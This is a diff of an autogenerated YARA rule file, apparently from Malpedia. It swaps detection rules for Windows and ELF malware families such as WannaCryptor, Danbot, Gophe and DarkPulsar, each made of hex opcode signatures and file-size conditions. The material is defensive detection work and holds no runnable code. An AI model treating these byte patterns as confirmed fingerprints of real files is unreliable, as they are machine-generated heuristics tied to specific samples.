 		license_url = "N/A"
-		logic_hash = "250b7ade9271df7a85ec6b855f6cf5a10251a0f1952bae0fcefa6519af030f1e"
+		logic_hash = "81e25c1dde542bb643a4ac77dae07f1869016dd02282de1f135701fd67f912a5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109342,32 +109504,32 @@ rule MALPEDIA_Win_Tarsip_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 899c2464420100 899c2468420100 8d442410 50 899c2484420100 e8???????? }
-		$sequence_1 = { bdc40f0000 897c240c 393e 0f868d010000 53 }
-		$sequence_2 = { 52 ba???????? 8bcf e8???????? 8d8424ac000000 50 e8???????? }
-		$sequence_3 = { 889c24c8020000 e8???????? 8b35???????? 83c40c 6804010000 8d8424c0020000 50 }
-		$sequence_4 = { 8d4c2414 68???????? 51 e8???????? 8b8618420100 83c41c 68000000a0 }
-		$sequence_5 = { 8b442410 50 e8???????? 83c404 b801000000 8b8c242c010000 64890d00000000 }
-		$sequence_6 = { 53 55 57 33db 8d8e907e0000 bd73020000 }
-		$sequence_7 = { eb6d 8b3f ebdc 8b8424ac000000 50 55 }
-		$sequence_8 = { c78424c8070000ffffffff c74424700f000000 895c246c 885c245c 39b4248c000000 720d 8b4c2478 }
-		$sequence_9 = { 52 e8???????? 83c414 eb10 6a0a 8d542404 52 }
+		$sequence_0 = { cd29 488d0d7b120200 e8???????? 488b442428 488905???????? 488d442428 }
+		$sequence_1 = { 488d0d7b120200 e8???????? 488b442428 488905???????? 488d442428 4883c008 }
+		$sequence_2 = { ff15???????? 488bf8 c7459038020000 0f1f4000 66660f1f840000000000 488d95d0010000 }
+		$sequence_3 = { c745ef41445641 33f6 488945e3 8975df }
+		$sequence_4 = { 488d15aed40100 488d4df7 e8???????? cc e8???????? cc }
+		$sequence_5 = { 33f6 8975f7 660f1f840000000000 488b0f 4c8d4df7 33c0 4889742420 }
+		$sequence_6 = { b9f4010000 ff15???????? 48c744243000000000 488d0d44470200 c744242880000000 4533c9 }
+		$sequence_7 = { 488bcf ff15???????? 85c0 0f84a0000000 }
+		$sequence_8 = { 83f801 7518 488b0d???????? 488d053b3c0100 483bc8 7405 e8???????? }
+		$sequence_9 = { 72c3 4c8b842490000000 ba01000000 498bcc ffd3 488b7c2460 488bc3 }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 389120
 }
-rule MALPEDIA_Win_Zumanek_Auto : FILE
+rule MALPEDIA_Win_Gophe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "87aee693-fd24-5045-ad68-bbf967fca577"
+		id = "ec866cdd-740c-530f-890b-7218c8279731"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zumanek"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zumanek_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gophe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gophe_auto.yar#L1-L160"
 		license_url = "N/A"
-		logic_hash = "692948458546aa7f1172f720f7a047815fbd39df276c694923c84a71f1135e40"
+		logic_hash = "040add08167375d6afc19889da745c342bfdae4cd932188be1ff896b4e36f3aa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109381,32 +109543,38 @@ rule MALPEDIA_Win_Zumanek_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { fc 81fe382e9330 97 e412 3dd16312c9 103f 0800 }
-		$sequence_1 = { 8802 98 811212242434 48 3c91 4a }
-		$sequence_2 = { 894612 4d 2454 48 5b 91 }
-		$sequence_3 = { 71ef 1a6f35 e30b 5d fc 77f2 f1 }
-		$sequence_4 = { 1dba45e22f 91 7c8b e459 0920 122424 }
-		$sequence_5 = { 386b95 4c 53 196a17 }
-		$sequence_6 = { 4a e8???????? 86b71986f742 06 58 4c 8812 }
-		$sequence_7 = { c101f6 53 32b879629b65 76a2 43 fc }
-		$sequence_8 = { d9c3 ab 5f c50f 9d 54 f233591b }
-		$sequence_9 = { 5a c59cd53a93a658 98 9f f5 6b80e7fa856bb2 55 }
+		$sequence_0 = { 833902 0f94c0 84c0 7407 }
+		$sequence_1 = { 8bf8 488b4c2440 488b01 ff5010 }
+		$sequence_2 = { 85c0 7509 b803000000 5d c20400 }
+		$sequence_3 = { 85c0 741c b800070000 5f }
+		$sequence_4 = { 8b07 85c0 7506 807e1000 7503 8a4e10 }
+		$sequence_5 = { 8bd8 85db 0f8498010000 83fbff }
+		$sequence_6 = { 84c0 7407 e8???????? eb06 e8???????? 90 488d8c24b8000000 }
+		$sequence_7 = { 84c0 0f8461ffffff e8???????? e9???????? }
+		$sequence_8 = { 7838 488b4c2440 ff15???????? 8bf8 85c0 7818 488b4c2440 }
+		$sequence_9 = { 8b05???????? 85c0 0f85a9000000 4533c9 4533c0 8d5010 }
+		$sequence_10 = { 8b442424 85c0 7408 3bc1 }
+		$sequence_11 = { 85f6 7416 6830020000 6a00 }
+		$sequence_12 = { e8???????? 4883f8ff 0f849e000000 8b05???????? }
+		$sequence_13 = { 894614 8b4614 85c0 740a }
+		$sequence_14 = { 8b4dec 33cd e8???????? 8be5 5d c21000 c745fc02000000 }
+		$sequence_15 = { c7000300150c 488b4210 c7400801000000 488b4210 }
 
 	condition:
-		7 of them and filesize < 58867712
+		7 of them and filesize < 1582080
 }
-rule MALPEDIA_Win_Jripbot_Auto : FILE
+rule MALPEDIA_Win_Danbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d8a957a2-00cf-53c5-96bc-d79d0345ba47"
+		id = "da55061d-0704-5ad4-a81b-0f3aa0376e8a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jripbot_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.danbot_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "fc945105d57ad1b4469be79b8a34ff87923dbb08f76d1d337925be7cac82b3ca"
+		logic_hash = "5da6053f066e9d13d04800876e4e18c27ca9158fbdceb66408c8360c250a0789"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109420,32 +109588,32 @@ rule MALPEDIA_Win_Jripbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc6 c1c007 33d0 8bc6 c1c806 33d0 8b459c }
-		$sequence_1 = { ffd6 b9???????? 8bc1 83c430 8d5002 668b30 }
-		$sequence_2 = { eb0e c7060c000000 eb06 c7060a000000 8b4d0c c1e905 53 }
-		$sequence_3 = { 83a7a400000000 6a08 59 8b8780000000 8d4401ff fe00 7503 }
-		$sequence_4 = { ff75e8 ffd7 be???????? e8???????? 8d5002 668b08 83c002 }
-		$sequence_5 = { 8b9554ffffff c1c20e c1cb07 33d3 8b9d54ffffff c1eb03 33d3 }
-		$sequence_6 = { 83ec0c 53 33c0 56 57 be???????? }
-		$sequence_7 = { eb16 ff7518 8b4d08 ff7514 ff7510 52 8b550c }
-		$sequence_8 = { 8bf0 83c408 85f6 7412 53 e8???????? 59 }
-		$sequence_9 = { 8bf8 85ff 7410 ff7508 56 57 }
+		$sequence_0 = { 440fb77c2430 41beffff0000 4885ff 7412 410fb7d7 488bcf e8???????? }
+		$sequence_1 = { e8???????? 488b4d10 4533d2 eba8 488b4d10 488d4500 }
+		$sequence_2 = { 4d8bc6 498bcf e8???????? e9???????? 4883fe10 7217 }
+		$sequence_3 = { c644243001 4883c702 4983ed01 75d6 e9???????? 0f29442430 488d7dbf }
+		$sequence_4 = { eb03 4d8be3 488b442448 8b5818 81e3c0010000 895c2424 83fb40 }
+		$sequence_5 = { 4983c8ff 49ffc0 46383402 75f7 488d4db0 e8???????? 488d45b0 }
+		$sequence_6 = { 418ade 488bcf e8???????? 498bd7 488bcf e8???????? 84c0 }
+		$sequence_7 = { eb03 488bc3 6644893448 eb22 48837b1808 7205 488b03 }
+		$sequence_8 = { 48837dff10 732c 4533c0 418d5008 488d4def e8???????? 4c8b4597 }
+		$sequence_9 = { 90 e9???????? 84c9 0f8453020000 8b442430 85c0 7408 }
 
 	condition:
-		7 of them and filesize < 507904
+		7 of them and filesize < 1492992
 }
-rule MALPEDIA_Win_Yahoyah_Auto : FILE
+rule MALPEDIA_Win_Wannacryptor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7d580a73-e71e-51e5-b9b2-111f677f9e42"
+		id = "64c0c24a-16a6-55da-a692-97069f01b9dc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.yahoyah_auto.yar#L1-L163"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wannacryptor_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "3c235d0922e2b2ae3e259f93f1da8403405399a9b438615162581b244056f37a"
+		logic_hash = "afdf6a6730d9f47a6baac4eceac9faa53fb74580c5a732dc9532925b43ed27e8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109459,37 +109627,32 @@ rule MALPEDIA_Win_Yahoyah_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 6a02 53 6af0 }
-		$sequence_1 = { 50 6800080000 ff15???????? ff15???????? }
-		$sequence_2 = { 50 e8???????? 59 53 53 6a03 0fb7c8 }
-		$sequence_3 = { e8???????? 59 56 56 8d45fc 50 }
-		$sequence_4 = { 53 6a03 0fb7c8 b8???????? 50 50 51 }
-		$sequence_5 = { ff15???????? 85c0 7501 c3 56 }
-		$sequence_6 = { 7503 41 eb09 33d2 3bd1 1bc9 83e102 }
-		$sequence_7 = { ff15???????? 6a2e 68???????? e8???????? }
-		$sequence_8 = { 53 53 56 53 ff15???????? 68d0070000 }
-		$sequence_9 = { c1ea18 52 0fb6d0 52 c1e808 }
-		$sequence_10 = { 68???????? 6890ef0000 68???????? 6a60 }
-		$sequence_11 = { ff15???????? 6a3a 56 e8???????? 8bf0 83c410 }
-		$sequence_12 = { 90 33c9 33c0 648b3530000000 8b760c 8b761c }
-		$sequence_13 = { 90 68add13441 ffb53ffbffff 6a00 e8???????? 898521f1ffff }
-		$sequence_14 = { 90 90 90 90 90 68add13441 ffb53ffbffff }
+		$sequence_0 = { 83f802 757f 8b5674 8d7e44 8d442414 52 }
+		$sequence_1 = { 23c3 8b5c2468 53 8b5c2468 53 }
+		$sequence_2 = { 8b16 c1f805 0faff8 897e04 8b4160 03c2 }
+		$sequence_3 = { 8d542418 c744243005000000 8b41f8 8b4e74 2bc1 }
+		$sequence_4 = { 51 885c243c e8???????? 50 8bcf c644243404 }
+		$sequence_5 = { 8d4c241c 6a01 51 8a02 8bcf 88442418 }
+		$sequence_6 = { 7e76 8bd8 8b5500 03cf 8a0417 50 }
+		$sequence_7 = { 8d442420 f7d8 1bc0 682000cc00 23c3 8b5c2468 53 }
+		$sequence_8 = { 0f8c42ffffff 8b442438 5f 85c0 7403 }
+		$sequence_9 = { 8a1401 8d4c2460 8854243c 8b44243c }
 
 	condition:
-		7 of them and filesize < 483328
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Elf_Hideandseek_Auto : FILE
+rule MALPEDIA_Win_Icexloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "98de3f6a-a564-55ea-8fed-c2f9d5e8c7a4"
+		id = "f39d0ab5-8213-59e6-b937-084e69d35431"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.hideandseek_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icexloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.icexloader_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "831bf70ed51337c7cfb50b54eee15779cbace8e90d2493dbccfcb114f36dd2a6"
+		logic_hash = "ebc5d7149c8501657e5a8c66abb5a20df9b61fa7b96a5f5c2d43922a15f6b368"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109503,32 +109666,32 @@ rule MALPEDIA_Elf_Hideandseek_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d1406 89cb 29c3 89d8 eb07 803a20 740f }
-		$sequence_1 = { 50 8d44241c 50 ff74242c e8???????? 59 }
-		$sequence_2 = { 8b4530 0facd010 c1ea10 88412d }
-		$sequence_3 = { 53 83ec0c 8b7c2420 8b6c2424 e8???????? 31d2 84c0 }
-		$sequence_4 = { 4f 85ff 75e4 eb42 a1???????? 85c0 }
-		$sequence_5 = { 752e 85ed 7512 52 52 50 56 }
-		$sequence_6 = { 53 53 e8???????? 83c410 89c3 85c0 0f8577050000 }
-		$sequence_7 = { 8a03 84c0 780e 0fb6c0 894500 8d4301 e9???????? }
-		$sequence_8 = { e8???????? 5b 85c0 5e 0f858dfeffff eb12 }
-		$sequence_9 = { 83c410 e9???????? c7460c00000000 e9???????? 50 50 }
+		$sequence_0 = { 8d47f8 e8???????? 8b4604 85c0 7408 83e808 e8???????? }
+		$sequence_1 = { 89d0 85c9 742d 8d51f8 3c02 7415 770e }
+		$sequence_2 = { 40 ebbd 8a0439 89c2 83e2df 80fa44 0f95c3 }
+		$sequence_3 = { 0fb605???????? 84c0 7505 e8???????? 8b4514 c70000000000 c745d800000000 }
+		$sequence_4 = { ebca 83c42c 89d8 5b 5e 5f 5d }
+		$sequence_5 = { 81ec8c010000 8b01 898dc0feffff 8b10 b8???????? 899594feffff e8???????? }
+		$sequence_6 = { c74424086c000000 e9???????? 891424 89ca 8d4de4 c744240400000000 e8???????? }
+		$sequence_7 = { c9 c20800 55 89e5 83ec28 d94508 8d4df4 }
+		$sequence_8 = { 8b17 83e33f c1f806 83cb80 83c8c0 885c3209 88443208 }
+		$sequence_9 = { 8b45dc 8b55d8 29d0 89c3 8b4508 8b5010 8b450c }
 
 	condition:
-		7 of them and filesize < 196608
+		7 of them and filesize < 656384
 }
-rule MALPEDIA_Win_Cosmicduke_Auto : FILE
+rule MALPEDIA_Win_Bootwreck_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5fb60344-131a-5131-b8e1-4edb7524b3e9"
+		id = "e46a87d8-ca64-51d8-8465-fa91fe773b67"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cosmicduke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cosmicduke_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bootwreck_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "7c78d88a6294fbefeccb9e02496af3e7aa8e7c4fd27d39a3747c54e6c53a3f19"
+		logic_hash = "7dd89e2ad6a7e4ec6bd403b4a60d8d35c2c5a80bbaddf577283e953056078258"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109542,34 +109705,34 @@ rule MALPEDIA_Win_Cosmicduke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 8db514ffffff e9???????? 8db504ffffff e9???????? b8???????? e9???????? }
-		$sequence_1 = { ff15???????? 6a02 6a02 6800000040 ff7510 53 ff15???????? }
-		$sequence_2 = { c644240f01 85f6 0f8594000000 ff742418 8d842414010000 ff742428 }
-		$sequence_3 = { 668985ecfeffff 0fb645fb 50 0fb645fa 50 0fb645f9 }
-		$sequence_4 = { 56 ff15???????? 885c2417 ebdd 33c9 394c2408 7e0f }
-		$sequence_5 = { 5f 85c0 7444 8b442454 8944240c 53 8d442414 }
-		$sequence_6 = { 83ffff 7416 8d45e4 50 57 ff15???????? 85c0 }
-		$sequence_7 = { 8bf8 8a8358020000 8bf3 8845ff e8???????? 84c0 0f84ae000000 }
-		$sequence_8 = { 53 53 8d44242c 50 ff15???????? 85c0 740d }
-		$sequence_9 = { 8b1d???????? 83c40c 8d842490000000 50 8d842414010000 50 ffd3 }
+		$sequence_0 = { 59 d558 6e 82c178 0e 2a5cce35 45 }
+		$sequence_1 = { e9???????? ff3424 6802f2412c 9c 876c2444 9c 681ef2f505 }
+		$sequence_2 = { 6a02 e8???????? 33db 3bc3 7412 ffd0 0fb7c0 }
+		$sequence_3 = { 660fb3c7 89c7 f9 f8 f5 84f0 83c404 }
+		$sequence_4 = { bed27fe028 a4 ab 5b 6212 672c13 1abaeb624f13 }
+		$sequence_5 = { 90 e8???????? 89442408 9c 660fb6c2 660fbec2 0f9ac4 }
+		$sequence_6 = { 85c0 881424 9c 60 66c70424320b 8d64242c 0f84e23a0300 }
+		$sequence_7 = { 25ffffff7f 66c1eb0d 6687f3 80f72b 60 0345fc 8d642444 }
+		$sequence_8 = { c6442414c9 c6442408a4 ff742430 c23400 ff3424 895e24 9c }
+		$sequence_9 = { 70af 9c 236202 3376ad 9add1461e82b4a 97 1e }
 
 	condition:
-		7 of them and filesize < 456704
+		7 of them and filesize < 10821632
 }
-rule MALPEDIA_Win_Koobface_Auto : FILE
+rule MALPEDIA_Win_Badcall_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c6a2ece4-bdc3-570c-90b1-bf28a4d5b166"
+		id = "6dc89352-23be-508c-aee9-54c70773ba33"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.koobface_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badcall"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.badcall_auto.yar#L1-L232"
 		license_url = "N/A"
-		logic_hash = "c65c2ad17a47311f43f81d1b6ae6bd5717f8484a20158d9b796e403e5d9ce6a0"
+		logic_hash = "f469c22ea661fc33aaf4e709b2c352b5b8bb3d75d2b5706e6fcd20955f630b93"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -109581,32 +109744,46 @@ rule MALPEDIA_Win_Koobface_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b8508ffffff 0fb68000294200 8919 891e }
-		$sequence_1 = { 33c0 eb1b 8d3400 8bc6 e8???????? 8965f0 8bc4 }
-		$sequence_2 = { 8d8548a2ffff 50 8d8514fcffff 50 e8???????? 83c410 84c0 }
-		$sequence_3 = { 85c0 0f85ae000000 8b45e4 8b08 53 68???????? 50 }
-		$sequence_4 = { e8???????? 8d85dca9ffff 50 e8???????? c70424???????? 8d8570a2ffff }
-		$sequence_5 = { e8???????? 8b8dccfdffff 8d850cffffff 50 c745fc04000000 e8???????? 834dfcff }
-		$sequence_6 = { 8b45e4 8b08 53 68???????? 50 ff5114 8d45ec }
-		$sequence_7 = { 8d1485a0534200 8b0a 83e61f c1e606 03ce 8a4124 02c0 }
-		$sequence_8 = { e8???????? 8b8dd0fdffff 8d850cffffff 50 c745fc17000000 e8???????? }
-		$sequence_9 = { 33cd fec0 5e e8???????? c9 c3 55 }
+		$sequence_0 = { 50 e8???????? 85c0 75d3 5f 33c0 }
+		$sequence_1 = { 6a06 6a01 6a02 c744241801000000 8944241c }
+		$sequence_2 = { 89442412 8bf1 6685ff 66c74424080000 6689442416 746d }
+		$sequence_3 = { 8b44241c 6685c0 7442 33d2 50 }
+		$sequence_4 = { 83f8ff 7453 8d4c2404 6a04 }
+		$sequence_5 = { 50 8954240a 66c74424080200 8954240e 894c240c 89542412 }
+		$sequence_6 = { 8d7c240d c644240c00 f3ab 66ab 8d4c242c }
+		$sequence_7 = { 8a4c2408 8a542420 3aca 7509 66817c24090103 7402 33c0 }
+		$sequence_8 = { 8be8 bfffff0000 83c404 3bef }
+		$sequence_9 = { c644242bb3 896c2418 ffd7 8bd8 8d442414 }
+		$sequence_10 = { 57 8b7c241c 83ff01 741b 83ff02 }
+		$sequence_11 = { 2bf9 895500 8d5504 8bc1 8bf7 }
+		$sequence_12 = { 55 ff15???????? 8bf8 83ffff 7512 5f }
+		$sequence_13 = { 81c408020000 c3 8d842414010000 6803010000 50 }
+		$sequence_14 = { 2bd1 8b4c2418 03c2 51 894608 }
+		$sequence_15 = { 895604 8b16 8bc7 2bc2 8b542418 }
+		$sequence_16 = { 0f8484000000 85c0 7473 8d442418 50 56 ff15???????? }
+		$sequence_17 = { 8d442410 6a04 50 53 e8???????? }
+		$sequence_18 = { 6a01 53 6689842486000000 ff15???????? }
+		$sequence_19 = { c3 8bc8 83e01f c1f905 8d04c0 8b0c8de0ad0110 }
+		$sequence_20 = { 83c102 03c7 4a 75f3 8b542440 }
+		$sequence_21 = { 7520 42 3bd1 7d1f 8a441410 }
+		$sequence_22 = { ffd6 8d7c240c 83c9ff 33c0 33d2 f2ae }
+		$sequence_23 = { 83e01f c1f905 8d34c0 8b048de0ad0110 }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 483328
 }
-rule MALPEDIA_Win_Predator_Auto : FILE
+rule MALPEDIA_Win_Lowkey_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2b266341-4566-5b09-970f-78abdb005204"
+		id = "0a67007e-1a9c-5f31-b37c-8c32fdff3311"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.predator_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowkey"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lowkey_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "3bb19506092c3990d39445359bc46f20b598a2af4c01b1d17206710e9f68b421"
+		logic_hash = "9d3c45875e4ddd32bb18b8cb6ded5fb4838ad62f27365a87e2390b683b239917"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109620,34 +109797,34 @@ rule MALPEDIA_Win_Predator_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89560c 834dfcff 8b4df4 64890d00000000 5f }
-		$sequence_1 = { 56 8bf1 8d4dfd 57 6a0a }
-		$sequence_2 = { 83ec18 8bc2 56 8bf1 8d4dfd 57 }
-		$sequence_3 = { 83c8ff e9???????? ff75ec e8???????? 59 8bf0 }
-		$sequence_4 = { 8b00 57 03c2 8bce 50 }
-		$sequence_5 = { 8d45fd 50 51 8bce }
-		$sequence_6 = { e9???????? ff75ec e8???????? 59 8bf0 }
-		$sequence_7 = { 0f42f9 83781410 7202 8b00 57 03c2 8bce }
-		$sequence_8 = { 56 57 8965f0 8365fc00 8b7508 8b450c }
-		$sequence_9 = { 8811 85c0 75f2 51 8d45fd 50 51 }
+		$sequence_0 = { 4d8bc7 e8???????? 2bef 396e1c 7f03 8b6e20 488b4e10 }
+		$sequence_1 = { 8bc2 488d15a468feff c1e803 89442448 448be0 89442440 85c0 }
+		$sequence_2 = { 750d ff15???????? 33c0 e9???????? f644242010 7438 807c244c2e }
+		$sequence_3 = { 44897c2420 4c8d4c2448 4c8d0544e7ffff 33d2 33c9 ff15???????? 4889442440 }
+		$sequence_4 = { 4489742420 33c9 ff15???????? 488bf8 e9???????? 6644896c243d }
+		$sequence_5 = { 76c4 b868000000 895c2438 4c8d8570090000 6689442435 488d542430 }
+		$sequence_6 = { 488d542450 488b4808 e8???????? eb4e b9d6000000 663bc1 }
+		$sequence_7 = { 33ff e8???????? 448bc3 8d5701 }
+		$sequence_8 = { c784243001000043726561 488d8c243c010000 c784243401000074655468 c784243801000072656164 448d4274 e8???????? }
+		$sequence_9 = { 4c8d0dd8d70300 418d4002 83f801 7617 498bd0 498bc0 83e23f }
 
 	condition:
-		7 of them and filesize < 2211840
+		7 of them and filesize < 643072
 }
-rule MALPEDIA_Win_Roseam_Auto : FILE
+rule MALPEDIA_Win_Darkpulsar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5720401d-650c-5ffa-937c-009deb00b79f"
+		id = "3c0e62f1-e08c-54de-80e8-3035c44da66d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.roseam_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkpulsar_auto.yar#L1-L471"
 		license_url = "N/A"
-		logic_hash = "6405b276e56fbb6391489a72f41f1ba4fb7da1db3c06ee822f393f99823911b5"
+		logic_hash = "a16686b6fd6dac730451b9eb62e01c34a4e8ab3b1c781a91de53e419e5302dea"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -109659,32 +109836,73 @@ rule MALPEDIA_Win_Roseam_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8512010000 33f6 b963000000 8dbd76ecffff 6689b574ecffff f3ab }
-		$sequence_1 = { 681de40a18 56 e8???????? 83c408 a3???????? 50 }
-		$sequence_2 = { 3bda 895df0 895508 8955f8 aa 0f8e8a040000 8b4510 }
-		$sequence_3 = { 9d 5d 58 33c0 668945fd 8845ff }
-		$sequence_4 = { 50 51 52 c745fc00000000 ff15???????? 85c0 0f8504020000 }
-		$sequence_5 = { 80c241 8855ff 68???????? 55 }
-		$sequence_6 = { 894df8 8b4d10 2bc8 8d5004 894d10 8b4dfc 89550c }
-		$sequence_7 = { 53 56 57 8b02 8945f8 50 }
-		$sequence_8 = { 58 8bc2 5f 5e }
-		$sequence_9 = { 668901 0fbe560c 89550c 68???????? }
+		$sequence_0 = { 33c0 40 c20c00 68???????? 64ff3500000000 8b442410 896c2410 }
+		$sequence_1 = { c21000 ff25???????? ff25???????? ff25???????? 33c0 }
+		$sequence_2 = { 3a01 1bc0 83e0fe 40 5f 5e }
+		$sequence_3 = { 59 3bd8 74e0 0fb607 8b4d0c 3a01 }
+		$sequence_4 = { 50 ffd6 8bd8 8b450c 0fbe00 50 ffd6 }
+		$sequence_5 = { 803f00 742e 47 ff450c 0fbe07 }
+		$sequence_6 = { 50 ffd6 59 59 3bd8 74e0 }
+		$sequence_7 = { 56 8b35???????? 57 8b7d08 eb09 }
+		$sequence_8 = { 8b5d10 56 8b7508 33d2 }
+		$sequence_9 = { e8???????? 59 85c0 7625 }
+		$sequence_10 = { 33c0 eb03 83c8ff 5f 5e c3 56 }
+		$sequence_11 = { 8bd8 53 e8???????? 83c410 85c0 750c }
+		$sequence_12 = { 59 5e 8b45fc c9 }
+		$sequence_13 = { 8d4601 6a01 50 ff15???????? 8bf8 }
+		$sequence_14 = { 8d45cc 50 57 e8???????? 83c410 85c0 }
+		$sequence_15 = { 1bc0 59 40 c3 e9???????? }
+		$sequence_16 = { 5e c9 c3 56 8b742408 85f6 7412 }
+		$sequence_17 = { e8???????? 8bf0 46 56 ff15???????? 59 }
+		$sequence_18 = { 50 ff7618 ff15???????? 59 59 85c0 }
+		$sequence_19 = { 53 33d2 56 57 33c0 }
+		$sequence_20 = { 5f 5e c3 8b442404 85c0 7503 }
+		$sequence_21 = { 56 e8???????? ff742414 50 e8???????? }
+		$sequence_22 = { ff75fc ff75f4 e8???????? 59 59 83f8ff }
+		$sequence_23 = { 83c410 83f8ff 0f95c1 49 }
+		$sequence_24 = { 33d2 c3 8bff 55 8bec b863736de0 394508 }
